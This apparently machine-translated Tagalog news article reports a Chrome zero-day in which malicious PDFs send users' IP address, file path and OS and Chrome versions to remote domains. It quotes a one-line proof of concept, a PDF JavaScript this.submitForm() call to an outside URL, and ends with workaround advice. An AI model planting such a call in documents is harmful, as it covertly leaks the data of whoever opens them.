Natuklasan ang serbisyo ng pagtuklas ng EdgeSpot ng isang nakakaintriga sa kahinaan sa zero-araw na Chrome na sinasamantala ang mga dokumento ng PDF. Pinapayagan ng kahinaan ang mga umaatake na mag-ani ng mga sensitibong data gamit ang mga nakakahamak na dokumento na PDF na binuksan sa Chrome.

Sa sandaling binuksan ng biktima ang kani-kanilang mga file na PDF sa Google Chrome, isang masamang programa ang nagsisimula na gumana sa background sa pamamagitan ng pagkolekta ng data ng gumagamit.

Ang data ay maipasa sa remote server na kinokontrol ng mga hacker. Maaari kang magtataka kung anong data ang sinipsip ng mga umaatake, target nila ang sumusunod na data sa iyong PC:

• IP address
• Buong landas ng file na PDF sa system
• Mga bersyon ng OS at Chrome

Mag-ingat sa mga file na PDF na na-ridden ng malware

Maaari kang magulat na malaman na walang nangyayari kapag ginamit ang Adobe Reader para sa pagbubukas ng mga file na PDF. Bilang karagdagan, ang mga kahilingan sa HTTP POST ay ginagamit upang maglipat ng data sa mga malalayong server nang walang interbensyon ng gumagamit.

Napansin ng mga eksperto na ang isa sa dalawang mga domain na readnotifycom o burpcollaboratornet ay tumatanggap ng data.

Maaari mong isipin ang intensity ng pag-atake sa pamamagitan ng pagsasaalang-alang sa katotohanan na ang karamihan sa software ng antivirus ay hindi nakakakita ng mga halimbawang napansin ni EdgeSpot.

Inihayag ng mga eksperto na ang mga umaatake ay gumagamit ng "this.submitForm ()" PDF Javascript API upang mangolekta ng sensitibong impormasyon ng mga gumagamit.

Sinubukan namin ito ng isang minimal na PoC, isang simpleng tawag sa API tulad ng "this.submitForm ('http://google.com/test')" ay gagawing ipadala ng Google Chrome ang personal na data sa google.com.

Napag-alaman ng mga eksperto na ang bugtong ng Chrome na ito ay sinasamantala ng dalawang magkakaibang hanay ng mga nakakahamak na file na PDF. Kapwa sila ay naikalat noong Oktubre 2017 at Setyembre 2018, ayon sa pagkakabanggit.

Kapansin-pansin, ang nakolekta na data ay maaaring magamit ng mga umaatake upang maayos ang pag-atake sa hinaharap. Iminumungkahi ng mga ulat na ang unang pangkat ng mga file ay naipon gamit ang serbisyo sa pagsubaybay sa ReadNotify.

Ang mga gumagamit ay maaaring magamit ang serbisyo upang subaybayan ang mga view ng gumagamit. Ang EdgeSpot ay hindi nagbahagi ng anumang mga detalye tungkol sa likas na katangian ng ikalawang hanay ng mga file na PDF.

Paano Manatiling Protektado

Nais ng Exploit detection service na EdgeSpot na alerto ang mga gumagamit ng Chrome tungkol sa mga potensyal na peligro dahil hindi inaasahang mai-release ang patch sa malapit na hinaharap.

Iniulat ni EdgeSpot sa Google ang tungkol sa kahinaan sa nakaraang taon at nangako ang kumpanya na maglabas ng isang patch sa huli ng Abril. H

May utang na loob, maaari mong isaalang-alang ang paggamit ng isang pansamantalang pag-workaround sa problema sa pamamagitan ng lokal na pagtingin sa natanggap na mga dokumento ng PDF gamit ang isang alternatibong PDF reader app.

Bilang kahalili, maaari mo ring buksan ang iyong mga dokumento na PDF sa Chrome sa pamamagitan ng pag-disconnect sa iyong mga system mula sa Internet. Samantala, maaari kang maghintay para sa pag-update ng Chrome 74 na inaasahang ilalabas sa Abril 23.